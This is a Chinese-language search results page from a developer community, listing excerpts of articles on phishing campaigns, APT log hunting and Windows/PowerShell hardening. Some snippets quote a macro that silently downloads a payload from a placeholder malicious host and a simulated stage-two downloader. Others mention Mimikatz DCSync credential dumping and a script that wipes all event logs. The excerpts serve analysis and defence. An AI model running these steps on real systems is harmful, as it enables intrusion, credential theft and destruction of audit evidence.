文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

MuddyWater组织在中东与北非的鱼叉式钓鱼攻击分析与防御对策

本次攻击延续其典型模式:利用社会工程诱导用户启用Office宏,触发多阶段载荷投递链,最终部署具备远程控制与数据回传能力的恶意软件。...NordVPN账号,从土耳其、阿联酋等邻近国家出口IP发起登录,规避地理异常检测;会话劫持:在成功登录后,维持长期会话,避免频繁重新认证触发警报。...当用户点击“启用内容”后,宏自动执行以下PowerShell命令:Sub AutoOpen()Dim cmd As Stringcmd = "powershell -w hidden -ep bypass...七、实证评估我们在隔离环境中复现了攻击链,并测试防御措施有效性:禁用宏后,100%阻止初始载荷执行;WDAC策略成功拦截Phoenix内存注入尝试(通过AMSI接口);EDR规则在PowerShell启动后...这要求防御方必须转变思维——从“防漏洞”转向“防人因”,从“被动响应”转向“主动狩猎”。此外,商用VPN服务被滥用于攻击跳板,暴露出第三方基础设施监管的盲区。

33710

高价值外交目标的定向鱼叉攻击与防御体系构建——以伊朗黑客行动为例

当用户在Windows系统中打开时,自动触发PowerShell脚本下载:PowerShell与COM对象(均为合法进程),且无文件落地,基于行为的EDR(如CrowdStrike、SentinelOne)若未启用深度脚本监控,极易漏报。...针对单关键词、低频转发的规则,常被归类为“用户自定义过滤”,不触发告警。(四)地理会话异常未启用受害者常跨国出差,若未建立精细化的“可信地理位置”基线,攻击者从德黑兰IP登录其邮箱可能被视为正常行为。...用户仅看到渲染画面,实际执行在云端沙箱中完成,恶意脚本无法接触本地系统。...Office自动预览及PowerShell脚本执行:# 禁用PowerShell脚本(仅允许签名脚本)Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope

32910
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Windows专属|Copaw极简部署指南:无需复杂操作,接入飞书打造私人AI助理

    前置准备(必做,少一步都可能失败)打开Windows自带的「PowerShell」(快捷键Win+X,直接选择,严禁用CMD,否则会导致命令执行失败);国内网络环境下,提前开启代理工具(重点解决后续依赖下载慢的问题...基础启动(默认端口,新手首选)copaw app启动成功后,终端会显示访问地址:http://127.0.0.1:8088,直接复制该地址,用任意浏览器打开,即可进入Copaw可视化控制台(不要关闭PowerShell...阶段5:Copaw绑定飞书凭证回到Copaw网页控制台,点击「频道」,找到飞书选项,填入之前复制的「App ID」和「App Secret」,保存并启用,此时飞书与Copaw已成功绑定,可正常交互。...阶段6:配置验证结果验证,在对话框输入,看会不会回复避坑总结(Windows用户专属)部署过程中若遇到问题,优先检查以下4点,90%的问题都能解决:所有命令必须在PowerShell中执行,CMD无法识别相关命令...;安装和下载依赖时,务必开启代理,否则会出现下载超时、安装失败;飞书权限必须完整导入,缺少任意一项,都会导致无法接收或发送消息;启动Copaw后,不要关闭PowerShell,关闭会终止服务,导致无法访问控制台和飞书交互

    11K33

    神兵利器 - APT-Hunter 威胁猎人日志分析工具

    收集日志:用户可以手动收集CSV和EVTX格式的日志,或者使用本文后面讨论的powershell脚本来自动提取所需的日志。...powershell脚本即可。...RDP访问服务器GUI终端 成功/失败身份验证的统计信息,以便获得身份验证摘要,以帮助您检测异常或不应该登录设备的用户 APT-Hunter检测到的事件 [T1086]使用sysmon日志检测带有可疑参数的...使用安全日志检测用户添加的用户到通用组 使用安全日志检测从全局组中删除的用户 使用安全日志检测从通用组中删除的用户 使用安全日志检测从本地组中删除的用户 使用安全日志检测从全局组中删除的用户 检测使用安全日志删除的用户帐户...使用安全日志检测系统审核策略更改 使用安全日志检测计划的任务创建 使用安全日志检测计划的任务删除 使用安全日志检测计划的任务更新 使用安全日志检测启用的计划任务 使用安全日志检测禁用的计划任务 检测Windows

    2.7K10

    通过Windows事件日志介绍APT-Hunter

    您可以将其用作过滤器把严重程度从百万个事件转换成数百个事件。 APT-Hunter如何工作? APT-Hunter具有两个部分,它们可以一起工作以帮助用户快速获取所需的数据。...收集日志:用户可以手动收集CSV和EVTX格式的日志,也可以使用本文后面讨论的powershell脚本自动提取所需的日志。...2.终端服务的统计信息,以使用户可以交互访问或使用RDP访问服务器GUI终端。 ? 3.成功/失败身份验证的统计信息,以便获得身份验证摘要,以帮助您检测异常或不应该登录设备的用户。 ?...使用安全日志检测用户添加到通用组的用户 使用安全日志检测从全局组中删除的用户 使用安全日志检测从通用组中删除的用户 使用安全日志检测从本地组中删除的用户 使用安全日志检测从全局组中删除的用户 检测使用安全日志删除的用户帐户...使用安全日志检测系统审核策略更改 使用安全日志检测计划的任务创建 使用安全日志检测计划的任务删除 使用安全日志检测计划的任务更新 使用安全日志检测启用的计划任务 使用安全日志检测禁用的计划任务 检测Windows

    2.5K20

    基于Windows Terminal的ClickFix攻击链演化与防御机制研究

    近年来,随着端点检测与响应(EDR)系统及邮件安全网关的智能化水平提升,传统的恶意附件投递和直接链接点击成功率显著下降。...例如,在财务系统中,弹窗可能提示“发票加载失败,请运行诊断脚本”;在协作平台中,则可能提示“会议插件需要更新权限”。...启用高级日志记录:开启PowerShell的脚本块日志记录(Script Block Logging)和模块日志记录。这将记录所有执行的PowerShell代码内容,无论其是否经过混淆。...# 启用脚本块日志的注册表设置示例Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging...6 结语ClickFix攻击战术从Win+R向Win+X的迁移,标志着网络钓鱼攻击进入了更加隐蔽和智能化的新阶段。攻击者通过利用合法的系统工具和用户心理盲区,成功构建了难以被传统特征库检测的攻击链。

    15010

    Windows: 使用PowerShell管理Hyper-V虚拟机

    一、启用Hyper-V功能 在使用PowerShell管理Hyper-V之前,您需要确保已启用Hyper-V功能。可以通过以下步骤启用Hyper-V: 打开PowerShell,以管理员身份运行。...在管理Hyper-V虚拟机时,您可能需要禁用安全引导和设置虚拟机从光盘优先引导。这在安装新的操作系统或进行系统恢复时尤为重要。本文将详细介绍如何使用PowerShell执行这些操作。 2.1....-EnableSecureBoot:启用或禁用安全引导,Off表示禁用。 2.2. 设置虚拟机光盘优先引导 要使虚拟机从光盘优先引导,可以调整启动顺序。...使用 Invoke-Command 运行脚本或命令 配合使用 PowerShell Direct 和 Invoke-Command 非常适合需要在虚拟机上运行一个命令或一个脚本但在这一点之外无需继续与虚拟机进行交互的情况...完整的虚拟机配置示例 以下是一个完整的PowerShell脚本示例,展示如何创建虚拟机、配置处理器和内存、设置ISO安装源、禁用安全引导以及设置光盘优先引导, 启动: powershell New-VM

    2.1K10

    【攻防实战】Windows系统安全防御全攻略:从账户到日志的终极防护指南

    cmd.exe wscript" tasks.txt 可疑任务识别特征: 特权账户(SYSTEM/Administrator)执行的PowerShell脚本 触发条件为"登录时"且执行路径为临时目录...敏感文件被访问 1102 审计日志清除 攻击者痕迹清除 事件关联时间线重建技术: # 获取近一天内的登录成功事件 $events = Get-WinEvent -FilterHashtable @{...(PowerShell执行策略设置为AllSigned) 内存保护机制(DEP、ASLR全面启用) 六、系统安全事件响应与恢复 1....专业化事件响应流程 应急响应标准操作程序(SOP): 发现与分类:根据VERIS框架对安全事件进行分类与严重性评估 封存与控制:隔离受感染系统,阻断攻击扩散途径 证据采集:使用取证工具获取内存镜像与磁盘镜像...在日常安全运营中,应建立多层次防御体系: 纵深防御策略:实施"预防→检测→响应→恢复"的完整安全生命周期管理 最小权限原则:严格控制用户与应用程序权限边界,减少攻击面 安全基线标准化:基于CIS基准或NIST

    1K11

    年终绩效邮件竟是“毒信”?网络钓鱼正借职场焦虑攻破企业防线

    经排查,攻击者利用社会工程学手段,精准模仿HR沟通风格,通过钓鱼邮件投放带有恶意宏的Office文档,成功在内网部署了LockBit 3.0变种勒索软件。...New-Object Net.WebClient).DownloadString('http://malicious[.]site/payload.ps1')"Shell payload, vbHideEnd Sub当用户启用宏后...,该脚本会静默调用PowerShell,从远程服务器下载第二阶段载荷(如Cobalt Strike Beacon或AgentTesla窃密木马),并注入内存执行,全程不写入磁盘——即所谓的“无文件攻击”...芦笛解释,“传统杀毒软件依赖文件特征码,而这类攻击只在内存中运行,且利用合法系统工具(如PowerShell、WMI),容易绕过EDR(终端检测与响应)系统的规则引擎。”...赎金谈判失败后,企业被迫启用离线备份,损失预估达1800万欧元。3.2 新加坡金融机构数据泄露事件2026年1月初,新加坡某银行收到多起客户投诉称账户异常交易。

    27810

    针对俄罗斯用户的Amnesia RAT多阶段钓鱼攻击机制研究

    为了绕过微软默认禁用宏的安全策略,文档内容通常包含诱导性文字,提示用户“启用内容”以查看完整文档或验证数字签名。一旦用户点击启用,宏代码即刻执行。...以下PowerShell脚本模拟了多阶段下载器的核心逻辑,展示了其如何从远程服务器获取并执行内存载荷:# 多阶段下载器模拟逻辑$urls = @("http://malicious-c2.ru/stage2...以下PowerShell脚本展示了如何通过注册表配置禁用宏,并启用通知模式:# 配置Office宏安全策略$officeVersions = @("16.0", "15.0") # 支持多个Office...攻击者通过精细的社会工程学设计、模块化的多阶段投递架构以及先进的反检测技术,成功绕过了传统的安全防线,实现了从初始渗透到数据窃取再到勒索加密的全链路攻击。...从源头的宏策略管控和用户意识提升,到过程中的行为分析与网络监控,再到最后的离线备份与应急响应,每一个环节都不可或缺。

    24810

    工控机电源策略强化部署工具--禁止电脑休眠

    避免生产中断 7×24小时不间断运行:确保生产线连续作业,避免因设备休眠导致的意外停产 消除重启延迟:休眠后恢复需要时间,禁止休眠可立即响应生产指令 2....保持实时控制 实时数据采集:确保PLC、传感器数据持续采集不中断 即时控制响应:避免因系统休眠导致的控制指令延迟执行 ⚡ 二、系统可靠性提升 1....\Disable-Sleep.ps1" 运行脚本效果: 脚本: # 工控机电源策略强化工具 # 科控物联 QQ: 2492123056 # 生产线专用 - 确保7x24小时不间断运行 # 检查管理员权限...:快速启动已禁用" "SUCCESS" } else { Write-Log "警告:快速启动可能仍启用!"...$successCount 项, 失败 $errorCount 项" "INFO" Write-Log "脚本执行完成时间: $(Get-Date -Format 'yyyy-MM-dd HH:mm:

    20310

    无需登录域控服务器也能抓 HASH 的方法

    所以我们现在可以使用 Invoke-Mimikatz PowerShell 脚本执行 OverPass-The-Hash 攻击,并使用 storagesvc 用户的权限启动一个新的 PowerShell...控制台: 在 New PowerShell 控制台中,我们可以加载 Invoke-Mimikatz PowerShell 脚本并执行 DCSync 攻击: 正如我们在上面的屏幕截图中看到的,我们能够成功执行...选择“配置以下审计事件:”复选框 选择成功和失败复选框 要捕获目录服务访问事件,我们需要启用“审核目录服务访问”日志。...选择“配置以下审计事件:”、“成功”和“失败”复选框 要捕获目录服务更改事件,我们需要启用“审核目录服务更改”日志。...选择“配置以下审计事件:”、“成功”和“失败”复选框 在我们的实验室中,我们使用HELK设置来解析和查询日志,并使用winlogbeat将日志从各个系统推送到HELK实例。

    3.6K10

    面向旅游行业的钓鱼攻击特征与纵深防御体系构建——基于以色列案例的实证研究

    2.2.2 恶意载荷类型Office文档宏病毒:PDF或.docm文件内嵌VBA脚本,执行PowerShell命令下载Cobalt Strike Beacon;伪装发票的HTML附件:加载远程JavaScript...3.2.2 终点保护策略强制禁用Office宏(组策略:Disable all except digitally signed macros);浏览器启用站点隔离(Site Isolation)防止跨站脚本窃取...Cookie;部署EDR(端点检测与响应)工具监控异常进程(如powershell调用webclient)。...3.4 异常行为检测构建用户行为基线模型,监控高风险操作:非工作时间批量导出客户数据;单日多次修改支付方式;从非常用地点登录管理后台。...5.2 防御效果指标 部署前 部署后 下降率钓鱼邮件点击率 22.1% 4.3% 80.5%成功入侵事件 0.8/月 0.1/月 87.5%平均响应时间(从告警到处置) 4.2小时 28分钟 —关键有效措施包括

    20700

    特拉维夫阳光下的暗流:以色列旅游业成钓鱼攻击新靶场,全球服务业敲响警钟

    以此次事件中最常见的恶意Word/PDF文档为例,其攻击链通常分为三阶段:阶段一:诱骗执行文档利用社会工程话术诱导用户启用宏或点击嵌入链接。...脚本即从C2服务器下载第二阶段载荷。...攻击者通过钓鱼邮件获取员工凭证,访问客户数据库。2023年,中国在线旅游平台途牛 被曝存在API接口越权漏洞,攻击者可遍历用户订单ID,获取他人行程、联系方式甚至身份证号。...端点检测与响应(EDR):监控进程树异常,如 Word 启动 PowerShell 下载脚本。网络微隔离:将PMS、支付系统与办公网络物理或逻辑隔离,限制横向移动。...强制MFA:所有访问客户数据的系统必须启用多因素认证,禁用短信验证码(易遭SIM Swap攻击),优先使用FIDO2安全密钥。3. 数据最小化与加密遵循“仅收集必要信息”原则。

    15410

    win11系统的安全性真牛逼

    win11系统的安全性真不是盖的,举3个例子 1、锁屏界面,输用户名和密码 部分版本的win11系统,即便启用了Administrator用户后,登录界面仍然不显示Administrator用户名,而是...代码使用wevtutil el获取所有事件日志,然后使用foreach循环逐个处理每个事件日志。...对于每个事件日志,脚本会尝试使用wevtutil cl命令清空它,并捕获可能出现的错误。如果无法清空某个日志,脚本将输出警告消息。...在“LiveId”目录下看不到“Analytic”,所以没法判断它到底是启用还是禁用的状态。有啥办法干预注册表实现吗?...WinHttpAutoProxySvc服务均失败,总之,关于WinHttpAutoProxySvc服务的所有尝试都失败。

    90020
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券